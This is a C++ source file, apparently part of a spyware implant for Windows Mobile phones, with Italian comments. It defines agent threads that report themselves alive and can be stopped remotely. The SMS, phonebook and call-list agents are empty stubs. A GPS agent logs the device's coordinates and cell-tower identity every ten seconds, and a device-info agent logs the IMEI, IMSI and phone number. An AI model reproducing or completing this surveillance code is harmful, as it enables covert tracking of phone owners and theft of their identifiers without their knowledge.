#include "Agents.h"
#include "Status.h"
#include "Conf.h"
#include "Common.h"
#include "Device.h"
#include <tapi.h>
#include <extapi.h>

DWORD WINAPI SmsAgent(LPVOID lpParam) {
	// Queste strutture dati vanno copiate e incollate in ogni agente
	AGENT_COMMON_DATA(AGENT_SMS);
	// Fine delle strutture dati obbligatorie

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL){
		AGENT_STOP_ME;
	}

	// Comunichiamo al mondo che siamo vivi
	AGENT_I_AM_ALIVE;

	// Attendiamo che qualcuno ci stoppi
	//WAIT_FOR_STOP;
	//MessageBox(NULL, L"SMS_AGENT: Stopping", L"SMS_AGENT", MB_OK);
	AGENT_STOP_ME;

	return 0;
}


DWORD WINAPI PhoneBookAgent(LPVOID lpParam) {
	// Queste strutture dati vanno copiate e incollate in ogni agente
	AGENT_COMMON_DATA(AGENT_PHONEBOOK);
	// Fine delle strutture dati obbligatorie

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL){
		AGENT_STOP_ME;
	}

	// Comunichiamo al mondo che siamo vivi
	AGENT_I_AM_ALIVE;

	AGENT_STOP_ME;

	return 0;
}

DWORD WINAPI CallListAgent(LPVOID lpParam) {
	AGENT_COMMON_DATA(AGENT_CALLLIST);

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL){
		AGENT_STOP_ME;
	}

	AGENT_I_AM_ALIVE;

	AGENT_STOP_ME;
	return 0;
}

DWORD WINAPI GpsAgent(LPVOID lpParam) {
	AGENT_COMMON_DATA(AGENT_GPS);
	GPS *position = NULL;
	Log *log;
	UINT uTimeout, uMaxAge, uType;

	typedef struct _GPSInfo {
		UINT uSize;
		UINT uVersion;
		GPS_POSITION gps;
	}GPSInfo;

	typedef struct _CellInfo {
		UINT uSize;
		UINT uVersion;
		RILCELLTOWERINFO cell;
	}CellInfo;

	GPSInfo gpsInfo;
	CellInfo cellInfo;

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL || myData->uParamLength != sizeof(UINT) * 2){
		AGENT_STOP_ME;
	}

	log = new(std::nothrow) Log();

	if(log == NULL) {
		AGENT_STOP_ME;
	}

	// Inizializziamo i parametri
	memcpy(&uTimeout, myData->pParams, sizeof(uTimeout));
	memcpy(&uMaxAge, (BYTE *)(myData->pParams) + 4, sizeof(uMaxAge));

	// E' singleton e non va distrutta
	position = GPS::self(uTimeout, uMaxAge);

	if(position == NULL) {
		AGENT_STOP_ME;
	}

	while(position->Start() == FALSE) {
		AGENT_CHECK_FOR_STOP;
		Sleep(2000);
	}

	AGENT_I_AM_ALIVE;

	if(log->CreateLog(AGENT_GPS, NULL, 0) == FALSE) {
		AGENT_STOP_ME;
	}

	/**
	 * LOG FORMAT
	 *
	 * DWORD|STRUCT
	 *
	 * DWORD indica il tipo di struttura che segue, STRUCT e' la struttura (GPS o CELL)
	 */
	LOOP {
		if(position->getGPS(&gpsInfo.gps)) {
			uType = TYPE_GPS;

			gpsInfo.uSize = sizeof(gpsInfo);
			gpsInfo.uVersion = GPS_VERSION;

			// Scriviamo il tipo di struttura e poi i dati
			DWORD dwFields = GPS_VALID_LATITUDE | GPS_VALID_LONGITUDE;

			if((gpsInfo.gps.dwValidFields & dwFields) == dwFields) {
				if(log->WriteLog((BYTE *)&uType, sizeof(uType)))
					log->WriteLog((BYTE *)&gpsInfo, sizeof(gpsInfo));
			}
		}

		if(position->getCELL(&cellInfo.cell)) {
			uType = TYPE_CELL;

			cellInfo.uSize = sizeof(cellInfo);
			cellInfo.uVersion = CELL_VERSION;

			// Scriviamo il tipo di struttura e poi i dati
			DWORD dwFields =  RIL_PARAM_CTI_MOBILECOUNTRYCODE | RIL_PARAM_CTI_MOBILENETWORKCODE |
								RIL_PARAM_CTI_LOCATIONAREACODE | RIL_PARAM_CTI_CELLID;

			if((cellInfo.cell.dwParams & dwFields) == dwFields) {
				if(log->WriteLog((BYTE *)&uType, sizeof(uType)))
					log->WriteLog((BYTE *)&cellInfo, sizeof(cellInfo));
			}

		}

		if(AgentSleep(MyID, 10000)) {
			log->CloseLog();
			position->Stop();
			delete log;
			AGENT_STOP_ME;
		}
	}

	AGENT_STOP_ME;
	return 0;
}

DWORD WINAPI DeviceInfoAgent(LPVOID lpParam) {
	AGENT_COMMON_DATA(AGENT_DEVICE);
	Log *log = NULL;
	Device *deviceObj = Device::self();
	WCHAR wLine[256];

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL || deviceObj == NULL) {
		AGENT_STOP_ME;
	}

	AGENT_I_AM_ALIVE;

	log = new(std::nothrow) Log;

	if(log == NULL) {
		AGENT_STOP_ME;
	}

	deviceObj->RefreshData();

	if(log->CreateLog(LOGTYPE_DEVICE, NULL, 0) == FALSE) {
		delete log;
		AGENT_STOP_ME;
	}

	// XXX allocare spazio come si deve se decidiamo di tenere questo agente
	ZeroMemory(wLine, 256 * sizeof(WCHAR));
	wsprintf(wLine, L"Manufacturer: %s\n", deviceObj->GetManufacturer() ? deviceObj->GetManufacturer() : L"Empty", 255);
	log->WriteLog((BYTE *)&wLine, WideLen(wLine));

	wsprintf(wLine, L"Model: %s\n", deviceObj->GetModel() ? deviceObj->GetModel() : L"Empty", 255);
	log->WriteLog((BYTE *)&wLine, WideLen(wLine));

	wsprintf(wLine, L"IMEI: %s\n", deviceObj->GetImei() ? deviceObj->GetImei() : L"Empty", 255);
	log->WriteLog((BYTE *)&wLine, WideLen(wLine));

	wsprintf(wLine, L"IMSI: %s\n", deviceObj->GetImsi() ? deviceObj->GetImsi() : L"Empty", 255);
	log->WriteLog((BYTE *)&wLine, WideLen(wLine));

	wsprintf(wLine, L"Phone Number: %s\n", deviceObj->GetPhoneNumber() ? deviceObj->GetPhoneNumber() : L"Empty", 255);
	log->WriteLog((BYTE *)&wLine, WideLen(wLine));

	log->CloseLog();

	delete log;
	AGENT_STOP_ME;
	return 0;
}

VOID FAR PASCAL lineCallbackFunc(DWORD hDevice, DWORD dwMsg, DWORD dwCallbackInstance, 
								 DWORD dwParam1, DWORD dwParam2, DWORD dwParam3) {
	BOOL bLogged = FALSE;

	return;

	/*switch(dwMsg)
	{
		case LINE_APPNEWCALL:
			
			break;
		default: break;
	}*/
}

BOOL AgentSleep(UINT Id, UINT uMillisec) {
	UINT uLoops;
	UINT uSleepTime = 1000; // Step di 1000ms
	BOOL bRet = FALSE;

	Status *statusObj = Status::self();
	list<AgentStruct *>::iterator iter;
	list<AgentStruct *> *agents;

	agents = statusObj->GetAgentsList();

	if(uMillisec <= uSleepTime){
		Sleep(uMillisec);
		
		AGENT_ID_QUERY_STOP(Id, bRet);

		if(bRet)
			return TRUE;
		
		return FALSE;
	}else{
		uLoops = uMillisec / uSleepTime;
	}

	while(uLoops){
		Sleep(uSleepTime);
		uLoops--;
		AGENT_ID_QUERY_STOP(Id, bRet);

		if(bRet)
			return TRUE;
	}

	return FALSE;
}